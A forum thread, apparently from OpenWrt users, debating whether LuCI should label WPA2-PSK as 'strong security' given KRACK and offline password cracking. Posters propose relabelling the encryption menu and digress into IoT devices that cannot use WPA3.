WPA2-PSK "strong security"?

I just installed 23.05.2 and found that the Wireless Security Encryption drop-down menu indicates "(strong security)" for WPA2l-PSK.

In my opinion, "strong security" hasn't been true since KRACK in 2017. (For instance, see this article.

There's also the issue of it being easy to capture the encrypted password, and then it is just a matter of high-speed guessing the password. See this recent article that mentions cracking 5,000 passwords from 10,000 wifi captures A single NVIDIA 3070 TI GPU can try ("guess") 1 million WPA2-PSK passwords every 2 seconds. Needless to say the guesses are intelligent, not dumb.

I suggest that the menu item be changed to reflect current reality. Maybe "Good security"? I wouldn't want anyone to face a claim of misleading statements about security.

4 Likes

On a tangential but related note, if you change the root password within LuCI, it has a warning about password strength that is entirely outdated and wrong. Using an 8-word diceware password, LuCI still complains that it is "weak".

As a solution, I propose that OpenWrt adopt a direct link on LuCI's password page to the XKCD "correct horse battery staple" comic:

https://xkcd.com/936/

:nerd_face:

5 Likes

Brute force will always work, that is a matter of time. That is why you don’t use words in any way or form or in any combinations.

The password lists that Kali Linux use is just like 14MB or even larger of a single long string of stolen passwords.
The more you know about your target, the more sophisticated settings you can use to crack the password.

I agree with the above comments but don't really want to go down the rabbit hole of what constitutes a good-enough password (dice ware, MFA, failed attempts, timeouts, etc). I hope this thread can concentrate on whether it is wise to call WPA2-PSK "strong security".

I will add one more thing: Since your WPA2 wifi traffic may have been captured already, its password may be already captured (if not yet broken or tried). I would suggest that when a user switches to WPA3-SAE (from even the mixed WPA2/WPA3), that the user is advised to create a new password, with an explanation why. Something like:

WPA2-PSK wifi signals can be captured and then later attacked to discover the password. When moving to a higher security mechanism (WPA3-SAE), choose a new password to avoid the security risk of a hacked old password.

It was you that dug the rabbit hole, if you don’t like the answers. Don’t ask the question.

1 Like

I'm very sorry, but that is objectively false.

And I concur with the @M_T that calling WPA2-PSK "strong security" is misleading. When you add the limitations that many client devices put on key complexity (i.e. smart TVs being used for streaming services which limit key length to 20 characters or a limited character set), "modest security" is even being generous.

All encryption will eventually and inevitably be compromised. In some cases this will be due to weaknesses in the arithmetic used to generate the encryption; in other cases this will be due to computers becoming ever faster and more powerful, making brute-force attacks trivial.

If you are concerned that the phrase "strong security" is misleading when describing WPA2-PSK, then I see three options open to you:

  • Submit a pull-request for a change of wording in OpenWRT, and see if the project maintainers will accept your PR;
  • Migrate your own equipment from WPA2 to WPA3;
  • Petition manufacturers to deprecate WPA2 in favour of WPA3, even in older equipment which they no longer support.
3 Likes

Absolutely true, but on a practical timescale centered on the present, WPA2-PSK can firmly be considered "currently compromised" rather than "may be compromised at some arbitrary date in the future".

Fair enough.

:rofl:

Well that “strong” security label is/was in relation to WEP (weak) and WPA1/2 mixed (medium). I am not tied to any specific wording, so I am open to more suitable suggestions. It just has to be terse and fit into a list of {WPA1 PSK, WPA1/2 PSK mixed, WPA2 PSK, WPA2 PSK/WPA3 SAE mixed, WPA3 SAE}

I could imagine dubbing WPA2 PSK as “average security”. That would both imply that the security properties are not particularly outstanding and that it (still) is the most widely used protocol.

3 Likes

I would think it fair for the menu to be:

  • WPA3-SAE (strong security)
  • WPA2-PSK (average security)
  • WPA2-PSK/WPA3-SAE (average security)
  • WPA-PSK/WPA2-PSK (weak security)
  • WPA-PSK (weak security)
  • OWE (open network)
  • No encryption (open network)

As you noticed, I put the mixed modes with their weaker half. As a major risk is the compromise of passwords at the weaker half, the stronger half is then vulnerable to the compromised password. Weakest link. (I again suggest that a warning be added to change passwords when moving to a stronger security level.)

Or, you could go with best, better, weak or poor. I would stay away from calling WPA2-PSK "good security". I think "average" is better than "better".

3 Likes

"Average" sounds well balanced between "strong" and "weak".

However, "average" should only apply to WPA2+CCMP/AES. WPA2+TKIP should be "weak". Therefore "average/weak" with a sentence of explanation in Cipher section could make sense.

While we are at it, could we also consider discouraging people from using mixed modes? It’s often more secure to setup 2 separate SSIDs than run mixed. Especially if you can keep these WPA2 devices on a separate subnet and firewall them.

1 Like

You do know that WPA3 is officially already cracked at least 2 times already so you can set ‘average’ on that to.

Maybe we should invert the naming and flag those security option as compromised? Or just flag the one that are weak?

Also I don't get where wpa2 is considered compromised... The current vulnerability are on other kind of part and not strictly to the algo itself.

Also wpa3 is still not that common to be considered ""standard" and working with every device.

Also provide articles that say wpa3 has been cracked... This may apply to old fw and OEM ones. Not ours that are updated as soon as the vulnerability is published.

4 Likes

Issues with WPA2:

  • doesn't feature forward secrecy. Recored traffic can later be decrypted when PSK is discovered.
  • some WPA2 devices don't support Protected Management Frames (802.11w), so such networks/devices are susceptible for deauth ddos and further attacks.
  • PSK could be offline recovered from captured packets, especially that many people don't use long or complicated phrases.

Unfortunately WPA3 is being developed behind closed doors, so flaws are getting discovered:

Maybe we should have some kind of "security profiles"? For example:

  • most secure: "WPA3-EAP+CCMP+PMF required+KRACK"
  • most secure: "WPA2-EAP+CCMP+PMF required+KRACK"
  • most secure: "WPA2/WPA3-EAP+CCMP+PMF required+KRACK"
  • secure: "WPA3-PSK+PMF required+KRACK"
    • not sure if KRACK mitigation is needed for WPA3
    • not sure if there are WPA3-personal devices that don't support PMF
  • moderate: "WPA2-PSK+CCMP+PMF required+KRACK+password length of X"
  • moderate: "WPA2-PSK+CCMP+PMF optional+KRACK+password length of X"
    • PMF isn't sometimes supported by older IOT devices etc.
  • custom: selecting custom shows the current UI where user can select anything.

Mitigation of bad passphrases could be done with a random psk generator with visible QR code.

I'd like a goal of this thread to be a consensus on what we agree, so that there's a basis for a PR to luci.

Edit: changed WPA2-EAP and mixed mode to "most secure" based on this lecture https://youtu.be/kEb0WKqAQ6c?si=kl5Axs4T-xeWGk2C (26:57)

What has that to do with wpa2 strength?

That is the IOT engineers fault they cut the security down.

But what is the point as NIST said? They all fall when quantum computers start do look at key cracking.

But it has already started talking about wpa4 for wifi7. So if and when wpa4 appears lets hope they actually are future proof.

So that's an example of "but technically...". The problem is that your weakest link anywhere in the network is what you have to worry about, and sometimes it's just not feasible for the average person to carefully vet the WiFi limitations of every device they own, especially since that information may not be possible to discover until after the device has been purchased.

If the key can trivially be captured, as it can with WPA2, then owning any device with a stupid limit on key complexity (of which there are many) means you are very vulnerable.

Fair point, though we're a few years away from that yet, and a very long time away from some random wardriver looking for free WiFi from the street outside your house having access to a quantum computer. If the NSA is after you, you've probably already lost no matter what you use.

:rofl: :rofl: :rofl:
WPA3 took, what, a solid decade to actually be widely available? I'll consider myself lucky to live long enough to see WPA4 in a real device.

That said, earlier in this thread you pointed out that WPA3 is more vulnerable than I realized, mostly but not entirely also because of stupid devices, so this whole topic is less useful than I originally thought.

Realistically, plain WPA2PSK/ CCMP (without 802.11w) is going to stay around for quite a long time to come, as most IoT or smarthome devices (or things like printers) rarely support WPA3 at all, even in new devices. E.g. the very common Espressif esp8266/ esp8285 can't do WPA3, the newer esp32 could (but e.g. Tasmota can't right now). So even for users who care about this topic, I don't see a possibility to get rid of WPA2 within the next ~5 years, when it comes to 'normal' users you're looking at 10+ years…

We have seen how long it took to get rid of WPA1/ TKIP or even WEP (and even today we're seeing complaints that OpeNWrt no longer ships with WEP support), but the situation back then was a lot easier - as there wasn't half a dozen to two dozen IoT or smarthome devices in a household, just addon WLAN cards in computers (and later some gaming consoles). Devices that could be upgraded or were replaced/ upgraded in a relatively quick cadence (compared to e.g. a washing machine, now think about printers, wireless surveillance cameras, smart light bulbs and things like that).

4 Likes

Just to add some examples which may have - and need WLAN features (and often not very good ones):

  • printers
  • cars (infotainment, OTA upgrades, …)
  • washing machines
  • pool pumps
  • heat pumps
  • solar inverters
  • smart plugs/ bulbs, buttons and sensors (temperature, etc.) of various kinds
4 Likes
  • printers
  • cars (infotainment, OTA upgrades, …)
  • washing machines
  • pool pumps
  • heat pumps
  • solar inverters
  • smart plugs/ bulbs, buttons and sensors (temperature, etc.) of various kinds

Dear gawd...

Absolutely nothing against @slh for making the list but how did people become so dependent on the damn washing machine needing an internet connection??
The rest are arguable but...

THE WASHING MACHINE????!

2 Likes

I have neither of those examples myself (apart from some esp8285, esp32 and esp32 c3 boards/ plugs to play with, but without a hard task to cover), but there may be reasons for that.

The washing times of modern washing machines (including dumb ones) vary a lot (+/- an hour or more), depending on the weight of its load and when it considers it to be clean (so using the same washing program), furthermore the predicted washing time does change (a lot) over the course of its washing program to similar extents - so the time needed varies a lot and is unpredictable in its nature. If you imagine a larger house (be it a detached house or an apartment complex), where you don't keep your washing machine in your living area (e.g. kitchen or bathroom), but more distant (e.g. in the basement), I can understand a desire to get a wireless notification when the washing is ready (no, you may not be able to hear its acoustic signal in the basement).

Another desire might be for owners of solar installations to start the washing when there is lots of excess free electricity from your own solar cells, even when you're still at work.

Look at it from a different angle, I can buy an exp32 c6 for ~3.60 EUR (including VAT, tax and customs) in single quantities and with direct shipping from China, imagine another buck for a relais - that's it in terms of the additional cost for these features for the manufacturer, so… why not? (yes, you as the customer will have to part with way more than 5 bucks for this capability, but that's a different story - it may still pay off in the aforementioned circumstances).

I like these kinds of devices to be dumb, less stuff to break, less of a security nightmare - but I do understand that others might have different priorities.

1 Like